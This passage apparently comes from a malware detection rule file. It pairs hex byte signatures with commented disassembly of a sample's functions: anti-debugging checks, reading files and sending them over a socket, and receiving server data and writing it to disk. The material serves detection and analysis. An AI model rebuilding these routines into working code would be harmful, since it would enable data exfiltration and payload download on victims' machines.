.text:0x00401e1d 8be5 mov esp,ebp + .text:0x00401e1f 5d pop ebp + .text:0x00401e20 c3 ret + */ + $c32 = { 55 8B EC 81 EC 1C 02 00 00 53 56 57 C7 45 ?? 00 00 00 00 C7 85 ?? ?? ?? ?? 00 00 00 00 C7 85 ?? ?? ?? ?? 00 00 00 00 64 A1 ?? ?? ?? ?? 8A 58 ?? 88 9D ?? ?? ?? ?? 0F BE 85 ?? ?? ?? ?? 85 C0 74 ?? E8 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 8B 40 ?? 3E 8B 40 ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? 00 74 ?? E8 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 3E 8B 40 ?? 83 E8 70 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? 00 75 ?? E8 ?? ?? ?? ?? 8B 4D ?? 51 8B 55 ?? 52 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 0C 85 C0 74 ?? B8 01 00 00 00 E9 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? 00 00 00 00 8B 4D ?? 51 68 00 02 00 00 6A 01 8D 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 10 89 45 ?? 6A 00 8B 45 ?? 50 8D 8D ?? ?? ?? ?? 51 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? FF 75 ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 04 B8 01 00 00 00 EB ?? 8B 8D ?? ?? ?? ?? 03 8D ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 3B 55 ?? 72 ?? 83 7D ?? 00 0F 87 ?? ?? ?? ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 04 85 C0 74 ?? B8 01 00 00 00 EB ?? 33 C0 5F 5E 5B 8B E5 5D C3 } + /* +function at 0x00401e30@7faafc7e4a5c736ebfee6abbbc812d80 with 5 features: + - check for PEB NtGlobalFlag flag + - read and send data from client to server + - read file on Windows + - send data + - send data on socket + .text:0x00401e30 + .text:0x00401e30 FUNC: int cdecl sub_00401e30( int arg0, int arg1, int arg2, ) [2 XREFS] + .text:0x00401e30 + .text:0x00401e30 Stack Variables: (offset from initial top of stack) + .text:0x00401e30 12: int arg2 + .text:0x00401e30 8: int arg1 + .text:0x00401e30 4: int arg0 + .text:0x00401e30 -8: int local8 + .text:0x00401e30 -12: int local12 + .text:0x00401e30 -524: int local524 + .text:0x00401e30 -528: int local528 + .text:0x00401e30 -532: int local532 + .text:0x00401e30 -536: int local536 + .text:0x00401e30 -540: int local540 + .text:0x00401e30 -544: int local544 + .text:0x00401e30 -548: int local548 + .text:0x00401e30 + .text:0x00401e30 55 push ebp + .text:0x00401e31 8bec mov ebp,esp + .text:0x00401e33 81ec20020000 sub esp,544 + .text:0x00401e39 53 push ebx + .text:0x00401e3a 56 push esi + .text:0x00401e3b 57 push edi + .text:0x00401e3c c745fc00000000 mov dword [ebp - 4],0 + .text:0x00401e43 c785e4fdffff0000 mov dword [ebp - 540],0 + .text:0x00401e4d c785e0fdffff0000 mov dword [ebp - 544],0 + .text:0x00401e57 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x00401e5d 8a5802 mov bl,byte [eax + 2] + .text:0x00401e60 889de8fdffff mov byte [ebp - 536],bl + .text:0x00401e66 0fbe85e8fdffff movsx eax,byte [ebp - 536] + .text:0x00401e6d 85c0 test eax,eax + .text:0x00401e6f 7405 jz 0x00401e76 + .text:0x00401e71 e88af1ffff call 0x00401000 ;sub_00401000() + .text:0x00401e76 loc_00401e76: [1 XREFS] + .text:0x00401e76 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x00401e7c 8b4018 mov eax,dword [eax + 24] + .text:0x00401e7f 3e8b4010 ds: mov eax,dword [eax + 16] + .text:0x00401e83 8985e4fdffff mov dword [ebp - 540],eax + .text:0x00401e89 83bde4fdffff00 cmp dword [ebp - 540],0 + .text:0x00401e90 7405 jz 0x00401e97 + .text:0x00401e92 e869f1ffff call 0x00401000 ;sub_00401000() + .text:0x00401e97 loc_00401e97: [1 XREFS] + .text:0x00401e97 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x00401e9d 3e8b4068 ds: mov eax,dword [eax + 104] + .text:0x00401ea1 83e870 sub eax,112 + .text:0x00401ea4 8985e0fdffff mov dword [ebp - 544],eax + .text:0x00401eaa 83bde0fdffff00 cmp dword [ebp - 544],0 + .text:0x00401eb1 7505 jnz 0x00401eb8 + .text:0x00401eb3 e848f1ffff call 0x00401000 ;sub_00401000() + .text:0x00401eb8 loc_00401eb8: [1 XREFS] + .text:0x00401eb8 8b4d0c mov ecx,dword [ebp + 12] + .text:0x00401ebb 51 push ecx + .text:0x00401ebc 8b5508 mov edx,dword [ebp + 8] + .text:0x00401ebf 52 push edx + .text:0x00401ec0 8d45fc lea eax,dword [ebp - 4] + .text:0x00401ec3 50 push eax + .text:0x00401ec4 e8e7fbffff call 0x00401ab0 ;sub_00401ab0(local8,arg0,arg1) + .text:0x00401ec9 83c40c add esp,12 + .text:0x00401ecc 85c0 test eax,eax + .text:0x00401ece 740a jz 0x00401eda + .text:0x00401ed0 b801000000 mov eax,1 + .text:0x00401ed5 e936010000 jmp 0x00402010 + .text:0x00401eda loc_00401eda: [1 XREFS] + .text:0x00401eda 6a00 push 0 + .text:0x00401edc 6880000000 push 128 + .text:0x00401ee1 6a03 push 3 + .text:0x00401ee3 6a00 push 0 + .text:0x00401ee5 6a01 push 1 + .text:0x00401ee7 6800000080 push 0x80000000 + .text:0x00401eec 8b4d10 mov ecx,dword [ebp + 16] + .text:0x00401eef 51 push ecx + .text:0x00401ef0 ff154cb04000 call dword [0x0040b04c] ;kernel32.CreateFileA(arg2,0x80000000,1,0,3,128,0) + .text:0x00401ef6 8985f4fdffff mov dword [ebp - 524],eax + .text:0x00401efc 83bdf4fdffffff cmp dword [ebp - 524],0xffffffff + .text:0x00401f03 7516 jnz 0x00401f1b + .text:0x00401f05 8d55fc lea edx,dword [ebp - 4] + .text:0x00401f08 52 push edx + .text:0x00401f09 e812fdffff call 0x00401c20 ;sub_00401c20(local8) + .text:0x00401f0e 83c404 add esp,4 + .text:0x00401f11 b801000000 mov eax,1 + .text:0x00401f16 e9f5000000 jmp 0x00402010 + .text:0x00401f1b loc_00401f1b: [2 XREFS] + .text:0x00401f1b c785f0fdffff0000 mov dword [ebp - 528],0 + .text:0x00401f25 6a00 push 0 + .text:0x00401f27 8d45f8 lea eax,dword [ebp - 8] + .text:0x00401f2a 50 push eax + .text:0x00401f2b 6800020000 push 512 + .text:0x00401f30 8d8df8fdffff lea ecx,dword [ebp - 520] + .text:0x00401f36 51 push ecx + .text:0x00401f37 8b95f4fdffff mov edx,dword [ebp - 524] + .text:0x00401f3d 52 push edx + .text:0x00401f3e ff1540b04000 call dword [0x0040b040] ;kernel32.ReadFile(kernel32.CreateFileA(arg2,0x80000000,1,0,3,128,0),local524,512,local12,0) + .text:0x00401f44 85c0 test eax,eax + .text:0x00401f46 7535 jnz 0x00401f7d + .text:0x00401f48 ff1544b04000 call dword [0x0040b044] ;ntdll.RtlGetLastWin32Error() + .text:0x00401f4e 83f826 cmp eax,38 + .text:0x00401f51 7423 jz 0x00401f76 + .text:0x00401f53 8d45fc lea eax,dword [ebp - 4] + .text:0x00401f56 50 push eax + .text:0x00401f57 e8c4fcffff call 0x00401c20 ;sub_00401c20(local8) + .text:0x00401f5c 83c404 add esp,4 + .text:0x00401f5f 8b8df4fdffff mov ecx,dword [ebp - 524] + .text:0x00401f65 51 push ecx + .text:0x00401f66 ff1558b04000 call dword [0x0040b058] ;kernel32.CloseHandle(<0x00401ef0>) + .text:0x00401f6c b801000000 mov eax,1 + .text:0x00401f71 e99a000000 jmp 0x00402010 + .text:0x00401f76 loc_00401f76: [1 XREFS] + .text:0x00401f76 c745f800000000 mov dword [ebp - 8],0 + .text:0x00401f7d loc_00401f7d: [2 XREFS] + .text:0x00401f7d 6a00 push 0 + .text:0x00401f7f 8b55f8 mov edx,dword [ebp - 8] + .text:0x00401f82 52 push edx + .text:0x00401f83 8d85f8fdffff lea eax,dword [ebp - 520] + .text:0x00401f89 50 push eax + .text:0x00401f8a 8b4dfc mov ecx,dword [ebp - 4] + .text:0x00401f8d 51 push ecx + .text:0x00401f8e ff154cb14000 call dword [0x0040b14c] ;ws2_32.send(0,local524,0xfefefefe,0) + .text:0x00401f94 8985ecfdffff mov dword [ebp - 532],eax + .text:0x00401f9a 83bdecfdffffff cmp dword [ebp - 532],0xffffffff + .text:0x00401fa1 7520 jnz 0x00401fc3 + .text:0x00401fa3 8d55fc lea edx,dword [ebp - 4] + .text:0x00401fa6 52 push edx + .text:0x00401fa7 e874fcffff call 0x00401c20 ;sub_00401c20(local8) + .text:0x00401fac 83c404 add esp,4 + .text:0x00401faf 8b85f4fdffff mov eax,dword [ebp - 524] + .text:0x00401fb5 50 push eax + .text:0x00401fb6 ff1558b04000 call dword [0x0040b058] ;kernel32.CloseHandle(<0x00401ef0>) + .text:0x00401fbc b801000000 mov eax,1 + .text:0x00401fc1 eb4d jmp 0x00402010 + .text:0x00401fc3 loc_00401fc3: [1 XREFS] + .text:0x00401fc3 8b8df0fdffff mov ecx,dword [ebp - 528] + .text:0x00401fc9 038decfdffff add ecx,dword [ebp - 532] + .text:0x00401fcf 898df0fdffff mov dword [ebp - 528],ecx + .text:0x00401fd5 8b95f0fdffff mov edx,dword [ebp - 528] + .text:0x00401fdb 3b55f8 cmp edx,dword [ebp - 8] + .text:0x00401fde 729d jc 0x00401f7d + .text:0x00401fe0 837df800 cmp dword [ebp - 8],0 + .text:0x00401fe4 0f8731ffffff ja 0x00401f1b + .text:0x00401fea 8b85f4fdffff mov eax,dword [ebp - 524] + .text:0x00401ff0 50 push eax + .text:0x00401ff1 ff1558b04000 call dword [0x0040b058] ;kernel32.CloseHandle(<0x00401ef0>) + .text:0x00401ff7 8d4dfc lea ecx,dword [ebp - 4] + .text:0x00401ffa 51 push ecx + .text:0x00401ffb e820fcffff call 0x00401c20 ;sub_00401c20(local8) + .text:0x00402000 83c404 add esp,4 + .text:0x00402003 85c0 test eax,eax + .text:0x00402005 7407 jz 0x0040200e + .text:0x00402007 b801000000 mov eax,1 + .text:0x0040200c eb02 jmp 0x00402010 + .text:0x0040200e loc_0040200e: [1 XREFS] + .text:0x0040200e 33c0 xor eax,eax + .text:0x00402010 loc_00402010: [5 XREFS] + .text:0x00402010 5f pop edi + .text:0x00402011 5e pop esi + .text:0x00402012 5b pop ebx + .text:0x00402013 8be5 mov esp,ebp + .text:0x00402015 5d pop ebp + .text:0x00402016 c3 ret + */ + $c33 = { 55 8B EC 81 EC 20 02 00 00 53 56 57 C7 45 ?? 00 00 00 00 C7 85 ?? ?? ?? ?? 00 00 00 00 C7 85 ?? ?? ?? ?? 00 00 00 00 64 A1 ?? ?? ?? ?? 8A 58 ?? 88 9D ?? ?? ?? ?? 0F BE 85 ?? ?? ?? ?? 85 C0 74 ?? E8 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 8B 40 ?? 3E 8B 40 ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? 00 74 ?? E8 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 3E 8B 40 ?? 83 E8 70 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? 00 75 ?? E8 ?? ?? ?? ?? 8B 4D ?? 51 8B 55 ?? 52 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 0C 85 C0 74 ?? B8 01 00 00 00 E9 ?? ?? ?? ?? 6A 00 68 80 00 00 00 6A 03 6A 00 6A 01 68 00 00 00 80 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? FF 75 ?? 8D 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 04 B8 01 00 00 00 E9 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? 00 00 00 00 6A 00 8D 45 ?? 50 68 00 02 00 00 8D 8D ?? ?? ?? ?? 51 8B 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF 15 ?? ?? ?? ?? 83 F8 26 74 ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 04 8B 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? B8 01 00 00 00 E9 ?? ?? ?? ?? C7 45 ?? 00 00 00 00 6A 00 8B 55 ?? 52 8D 85 ?? ?? ?? ?? 50 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? FF 75 ?? 8D 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 04 8B 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? B8 01 00 00 00 EB ?? 8B 8D ?? ?? ?? ?? 03 8D ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 3B 55 ?? 72 ?? 83 7D ?? 00 0F 87 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8D 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 04 85 C0 74 ?? B8 01 00 00 00 EB ?? 33 C0 5F 5E 5B 8B E5 5D C3 } + /* +function at 0x00402020@7faafc7e4a5c736ebfee6abbbc812d80 with 5 features: + - check for PEB NtGlobalFlag flag + - receive and write data from server to client + - receive data + - receive data on socket + - write file on Windows + .text:0x00402020 + .text:0x00402020 FUNC: int cdecl sub_00402020( int arg0, int arg1, int arg2, ) [2 XREFS] + .text:0x00402020 + .text:0x00402020 Stack Variables: (offset from initial top of stack) + .text:0x00402020 12: int arg2 + .text:0x00402020 8: int arg1 + .text:0x00402020 4: int arg0 + .text:0x00402020 -8: int local8 + .text:0x00402020 -12: int local12 + .text:0x00402020 -524: int local524 + .text:0x00402020 -528: int local528 + .text:0x00402020 -532: int local532 + .text:0x00402020 -536: int local536 + .text:0x00402020 -540: int local540 + .text:0x00402020 + .text:0x00402020 55 push ebp + .text:0x00402021 8bec mov ebp,esp + .text:0x00402023 81ec18020000 sub esp,536 + .text:0x00402029 53 push ebx + .text:0x0040202a 56 push esi + .text:0x0040202b 57 push edi + .text:0x0040202c c745f800000000 mov dword [ebp - 8],0 + .text:0x00402033 c785ecfdffff0000 mov dword [ebp - 532],0 + .text:0x0040203d c785e8fdffff0000 mov dword [ebp - 536],0 + .text:0x00402047 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x0040204d 8a5802 mov bl,byte [eax + 2] + .text:0x00402050 889df0fdffff mov byte [ebp - 528],bl + .text:0x00402056 0fbe85f0fdffff movsx eax,byte [ebp - 528] + .text:0x0040205d 85c0 test eax,eax + .text:0x0040205f 7405 jz 0x00402066 + .text:0x00402061 e89aefffff call 0x00401000 ;sub_00401000() + .text:0x00402066 loc_00402066: [1 XREFS] + .text:0x00402066 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x0040206c 8b4018 mov eax,dword [eax + 24] + .text:0x0040206f 3e8b4010 ds: mov eax,dword [eax + 16] + .text:0x00402073 8985ecfdffff mov dword [ebp - 532],eax + .text:0x00402079 83bdecfdffff00 cmp dword [ebp - 532],0 + .text:0x00402080 7405 jz 0x00402087 + .text:0x00402082 e879efffff call 0x00401000 ;sub_00401000() + .text:0x00402087 loc_00402087: [1 XREFS] + .text:0x00402087 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x0040208d 3e8b4068 ds: mov eax,dword [eax + 104] + .text:0x00402091 83e870 sub eax,112 + .text:0x00402094 8985e8fdffff mov dword [ebp - 536],eax + .text:0x0040209a 83bde8fdffff00 cmp dword [ebp - 536],0 + .text:0x004020a1 7505 jnz 0x004020a8 + .text:0x004020a3 e858efffff call 0x00401000 ;sub_00401000() + .text:0x004020a8 loc_004020a8: [1 XREFS] + .text:0x004020a8 8b4d0c mov ecx,dword [ebp + 12] + .text:0x004020ab 51 push ecx + .text:0x004020ac 8b5508 mov edx,dword [ebp + 8] + .text:0x004020af 52 push edx + .text:0x004020b0 8d45f8 lea eax,dword [ebp - 8] + .text:0x004020b3 50 push eax + .text:0x004020b4 e8f7f9ffff call 0x00401ab0 ;sub_00401ab0(local12,arg0,arg1) + .text:0x004020b9 83c40c add esp,12 + .text:0x004020bc 85c0 test eax,eax + .text:0x004020be 740a jz 0x004020ca + .text:0x004020c0 b801000000 mov eax,1 + .text:0x004020c5 e9d4000000 jmp 0x0040219e + .text:0x004020ca loc_004020ca: [1 XREFS] + .text:0x004020ca 6a00 push 0 + .text:0x004020cc 6880000000 push 128 + .text:0x004020d1 6a02 push 2 + .text:0x004020d3 6a00 push 0 + .text:0x004020d5 6a02 push 2 + .text:0x004020d7 6800000040 push 0x40000000 + .text:0x004020dc 8b4d10 mov ecx,dword [ebp + 16] + .text:0x004020df 51 push ecx + .text:0x004020e0 ff154cb04000 call dword [0x0040b04c] ;kernel32.CreateFileA(arg2,0x40000000,2,0,2,128,0) + .text:0x004020e6 8985f4fdffff mov dword [ebp - 524],eax + .text:0x004020ec 83bdf4fdffffff cmp dword [ebp - 524],0xffffffff + .text:0x004020f3 7516 jnz 0x0040210b + .text:0x004020f5 8d55f8 lea edx,dword [ebp - 8] + .text:0x004020f8 52 push edx + .text:0x004020f9 e822fbffff call 0x00401c20 ;sub_00401c20(local12) + .text:0x004020fe 83c404 add esp,4 + .text:0x00402101 b801000000 mov eax,1 + .text:0x00402106 e993000000 jmp 0x0040219e + .text:0x0040210b loc_0040210b: [2 XREFS] + .text:0x0040210b 6a00 push 0 + .text:0x0040210d 6800020000 push 512 + .text:0x00402112 8d85f8fdffff lea eax,dword [ebp - 520] + .text:0x00402118 50 push eax + .text:0x00402119 8b4df8 mov ecx,dword [ebp - 8] + .text:0x0040211c 51 push ecx + .text:0x0040211d ff1560b14000 call dword [0x0040b160] ;ws2_32.recv(0,local524,512) + .text:0x00402123 8945fc mov dword [ebp - 4],eax + .text:0x00402126 6a00 push 0 + .text:0x00402128 6a00 push 0 + .text:0x0040212a 8b55fc mov edx,dword [ebp - 4] + .text:0x0040212d 52 push edx + .text:0x0040212e 8d85f8fdffff lea eax,dword [ebp - 520] + .text:0x00402134 50 push eax + .text:0x00402135 8b8df4fdffff mov ecx,dword [ebp - 524] + .text:0x0040213b 51 push ecx + .text:0x0040213c ff153cb04000 call dword [0x0040b03c] ;kernel32.WriteFile(kernel32.CreateFileA(arg2,0x40000000,2,0,2,128,0),local524,ws2_32.recv(0,local524,512),0,0) + .text:0x00402142 85c0 test eax,eax + .text:0x00402144 7520 jnz 0x00402166 + .text:0x00402146 8d55f8 lea edx,dword [ebp - 8] + .text:0x00402149 52 push edx + .text:0x0040214a e8d1faffff call 0x00401c20 ;sub_00401c20(local12) + .text:0x0040214f 83c404 add esp,4 + .text:0x00402152 8b85f4fdffff mov eax,dword [ebp - 524] + .text:0x00402158 50 push eax + .text:0x00402159 ff1558b04000 call dword [0x0040b058] ;kernel32.CloseHandle(<0x004020e0>) + .text:0x0040215f b801000000 mov eax,1 + .text:0x00402164 eb38 jmp 0x0040219e + .text:0x00402166 loc_00402166: [1 XREFS] + .text:0x00402166 837dfc00 cmp dword [ebp - 4],0 + .text:0x0040216a 7f9f jg 0x0040210b + .text:0x0040216c 8b8df4fdffff mov ecx,dword [ebp - 524] + .text:0x00402172 51 push ecx + .text:0x00402173 ff1558b04000 call dword [0x0040b058] ;kernel32.CloseHandle(<0x004020e0>) + .text:0x00402179 8d55f8 lea edx,dword [ebp - 8] + .text:0x0040217c 52 push edx + .text:0x0040217d e89efaffff call 0x00401c20 ;sub_00401c20(local12) + .text:0x00402182 83c404 add esp,4 + .text:0x00402185 85c0 test eax,eax + .text:0x00402187 7407 jz 0x00402190 + .text:0x00402189 b801000000 mov eax,1 + .text:0x0040218e eb0e jmp 0x0040219e + .text:0x00402190 loc_00402190: [1 XREFS] + .text:0x00402190 8b4510 mov eax,dword [ebp + 16] + .text:0x00402193 50 push eax + .text:0x00402194 e817f8ffff call 0x004019b0 ;sub_004019b0(arg2) + .text:0x00402199 83c404 add esp,4 + .text:0x0040219c 33c0 xor eax,eax + .text:0x0040219e loc_0040219e: [4 XREFS] + .text:0x0040219e 5f pop edi + .text:0x0040219f 5e pop esi + .text:0x004021a0 5b pop ebx + .text:0x004021a1 8be5 mov esp,ebp + .text:0x004021a3 5d pop ebp + .text:0x004021a4 c3 ret + */ + $c34 = { 55 8B EC 81 EC 18 02 00 00 53 56 57 C7 45 ?? 00 00 00 00 C7 85 ?? ?? ?? ?? 00 00 00 00 C7 85 ?? ?? ?? ?? 00 00 00 00 64 A1 ?? ?? ?? ?? 8A 58 ?? 88 9D ?? ?? ?? ?? 0F BE 85 ?? ?? ?? ?? 85 C0 74 ?? E8 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 8B 40 ?? 3E 8B 40 ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? 00 74 ?? E8 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 3E 8B 40 ?? 83 E8 70 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? 00 75 ?? E8 ?? ?? ?? ?? 8B 4D ?? 51 8B 55 ?? 52 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 0C 85 C0 74 ?? B8 01 00 00 00 E9 ?? ?? ?? ?? 6A 00 68 80 00 00 00 6A 02 6A 00 6A 02 68 00 00 00 40 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? FF 75 ?? 8D 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 04 B8 01 00 00 00 E9 ?? ?? ?? ?? 6A 00 68 00 02 00 00 8D 85 ?? ?? ?? ?? 50 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 89 45 ?? 6A 00 6A 00 8B 55 ?? 52 8D 85 ?? ?? ?? ?? 50 8B 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 8D 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 04 8B 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? B8 01 00 00 00 EB ?? 83 7D ?? 00 7F ?? 8B 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 8D 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 04 85 C0 74 ?? B8 01 00 00 00 EB ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 04 33 C0 5F 5E 5B 8B E5 5D C3 } + /* +function at 0x004021b0@7faafc7e4a5c736ebfee6abbbc812d80 with 6 features: + - check for PEB NtGlobalFlag flag + - receive data + - receive data on socket + - send HTTP request + - send data + - send data on socket + .text:0x004021b0 + .text:0x004021b0 FUNC: int cdecl sub_004021b0( int arg0, int arg1, int arg2, int arg3, int arg4, ) [2 XREFS] + .text:0x004021b0 + .text:0x004021b0 Stack Variables: (offset from initial top of stack) + .text:0x004021b0 20: int arg4 + .text:0x004021b0 16: int arg3 + .text:0x004021b0 12: int arg2 + .text:0x004021b0 8: int arg1 + .text:0x004021b0 4: int arg0 + .text:0x004021b0 -8: int local8 + .text:0x004021b0 -1032: int local1032 + .text:0x004021b0 -1036: int local1036 + .text:0x004021b0 -1040: int local1040 + .text:0x004021b0 -1552: int local1552 + .text:0x004021b0 -1556: int local1556 + .text:0x004021b0 -1560: int local1560 + .text:0x004021b0 -1564: int local1564 + .text:0x004021b0 -1568: int local1568 + .text:0x004021b0 + .text:0x004021b0 55 push ebp + .text:0x004021b1 8bec mov ebp,esp + .text:0x004021b3 81ec1c060000 sub esp,1564 + .text:0x004021b9 53 push ebx + .text:0x004021ba 56 push esi + .text:0x004021bb 57 push edi + .text:0x004021bc c785f4fbffff0000 mov dword [ebp - 1036],0 + .text:0x004021c6 c785f8fbffff0000 mov dword [ebp - 1032],0 + .text:0x004021d0 c785e8f9ffff0000 mov dword [ebp - 1560],0 + .text:0x004021da c785e4f9ffff0000 mov dword [ebp - 1564],0 + .text:0x004021e4 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x004021ea 8a5802 mov bl,byte [eax + 2] + .text:0x004021ed 889decf9ffff mov byte [ebp - 1556],bl + .text:0x004021f3 0fbe85ecf9ffff movsx eax,byte [ebp - 1556] + .text:0x004021fa 85c0 test eax,eax + .text:0x004021fc 7405 jz 0x00402203 + .text:0x004021fe e8fdedffff call 0x00401000 ;sub_00401000() + .text:0x00402203 loc_00402203: [1 XREFS] + .text:0x00402203 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x00402209 8b4018 mov eax,dword [eax + 24] + .text:0x0040220c 3e8b4010 ds: mov eax,dword [eax + 16] + .text:0x00402210 8985e8f9ffff mov dword [ebp - 1560],eax + .text:0x00402216 83bde8f9ffff00 cmp dword [ebp - 1560],0 + .text:0x0040221d 7405 jz 0x00402224 + .text:0x0040221f e8dcedffff call 0x00401000 ;sub_00401000() + .text:0x00402224 loc_00402224: [1 XREFS] + .text:0x00402224 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x0040222a 3e8b4068 ds: mov eax,dword [eax + 104] + .text:0x0040222e 83e870 sub eax,112 + .text:0x00402231 8985e4f9ffff mov dword [ebp - 1564],eax + .text:0x00402237 83bde4f9ffff00 cmp dword [ebp - 1564],0 + .text:0x0040223e 7505 jnz 0x00402245 + .text:0x00402240 e8bbedffff call 0x00401000 ;sub_00401000() + .text:0x00402245 loc_00402245: [1 XREFS] + .text:0x00402245 8b4d0c mov ecx,dword [ebp + 12] + .text:0x00402248 51 push ecx + .text:0x00402249 8b5508 mov edx,dword [ebp + 8] + .text:0x0040224c 52 push edx + .text:0x0040224d 8d85f4fbffff lea eax,dword [ebp - 1036] + .text:0x00402253 50 push eax + .text:0x00402254 e857f8ffff call 0x00401ab0 ;sub_00401ab0(local1040,arg0,arg1) + .text:0x00402259 83c40c add esp,12 + .text:0x0040225c 85c0 test eax,eax + .text:0x0040225e 740a jz 0x0040226a + .text:0x00402260 b801000000 mov eax,1 + .text:0x00402265 e9c7010000 jmp 0x00402431 + .text:0x0040226a loc_0040226a: [1 XREFS] + .text:0x0040226a bf98c04000 mov edi,0x0040c098 + .text:0x0040226f 8d95fcfbffff lea edx,dword [ebp - 1028] + .text:0x00402275 83c9ff or ecx,0xffffffff + .text:0x00402278 33c0 xor eax,eax + .text:0x0040227a f2ae repnz: scasb + .text:0x0040227c f7d1 not ecx + .text:0x0040227e 2bf9 sub edi,ecx + .text:0x00402280 8bf7 mov esi,edi + .text:0x00402282 8bc1 mov eax,ecx + .text:0x00402284 8bfa mov edi,edx + .text:0x00402286 c1e902 shr ecx,2 + .text:0x00402289 f3a5 rep: movsd + .text:0x0040228b 8bc8 mov ecx,eax + .text:0x0040228d 83e103 and ecx,3 + .text:0x00402290 f3a4 rep: movsb + .text:0x00402292 8b7d10 mov edi,dword [ebp + 16] + .text:0x00402295 8d95fcfbffff lea edx,dword [ebp - 1028] + .text:0x0040229b 83c9ff or ecx,0xffffffff + .text:0x0040229e 33c0 xor eax,eax + .text:0x004022a0 f2ae repnz: scasb + .text:0x004022a2 f7d1 not ecx + .text:0x004022a4 2bf9 sub edi,ecx + .text:0x004022a6 8bf7 mov esi,edi + .text:0x004022a8 8bd9 mov ebx,ecx + .text:0x004022aa 8bfa mov edi,edx + .text:0x004022ac 83c9ff or ecx,0xffffffff + .text:0x004022af 33c0 xor eax,eax + .text:0x004022b1 f2ae repnz: scasb + .text:0x004022b3 83c7ff add edi,0xffffffff + .text:0x004022b6 8bcb mov ecx,ebx + .text:0x004022b8 c1e902 shr ecx,2 + .text:0x004022bb f3a5 rep: movsd + .text:0x004022bd 8bcb mov ecx,ebx + .text:0x004022bf 83e103 and ecx,3 + .text:0x004022c2 f3a4 rep: movsb + .text:0x004022c4 bf88c04000 mov edi,0x0040c088 + .text:0x004022c9 8d95fcfbffff lea edx,dword [ebp - 1028] + .text:0x004022cf 83c9ff or ecx,0xffffffff + .text:0x004022d2 33c0 xor eax,eax + .text:0x004022d4 f2ae repnz: scasb + .text:0x004022d6 f7d1 not ecx + .text:0x004022d8 2bf9 sub edi,ecx + .text:0x004022da 8bf7 mov esi,edi + .text:0x004022dc 8bd9 mov ebx,ecx + .text:0x004022de 8bfa mov edi,edx + .text:0x004022e0 83c9ff or ecx,0xffffffff + .text:0x004022e3 33c0 xor eax,eax + .text:0x004022e5 f2ae repnz: scasb + .text:0x004022e7 83c7ff add edi,0xffffffff + .text:0x004022ea 8bcb mov ecx,ebx + .text:0x004022ec c1e902 shr ecx,2 + .text:0x004022ef f3a5 rep: movsd + .text:0x004022f1 8bcb mov ecx,ebx + .text:0x004022f3 83e103 and ecx,3 + .text:0x004022f6 f3a4 rep: movsb + .text:0x004022f8 6a00 push 0 + .text:0x004022fa 8dbdfcfbffff lea edi,dword [ebp - 1028] + .text:0x00402300 83c9ff or ecx,0xffffffff + .text:0x00402303 33c0 xor eax,eax + .text:0x00402305 f2ae repnz: scasb + .text:0x00402307 f7d1 not ecx + .text:0x00402309 83c1ff add ecx,0xffffffff + .text:0x0040230c 51 push ecx + .text:0x0040230d 8d85fcfbffff lea eax,dword [ebp - 1028] + .text:0x00402313 50 push eax + .text:0x00402314 8b8df4fbffff mov ecx,dword [ebp - 1036] + .text:0x0040231a 51 push ecx + .text:0x0040231b ff154cb14000 call dword [0x0040b14c] ;ws2_32.send(0,local1032,0xffffffff,0) + .text:0x00402321 8985f0f9ffff mov dword [ebp - 1552],eax + .text:0x00402327 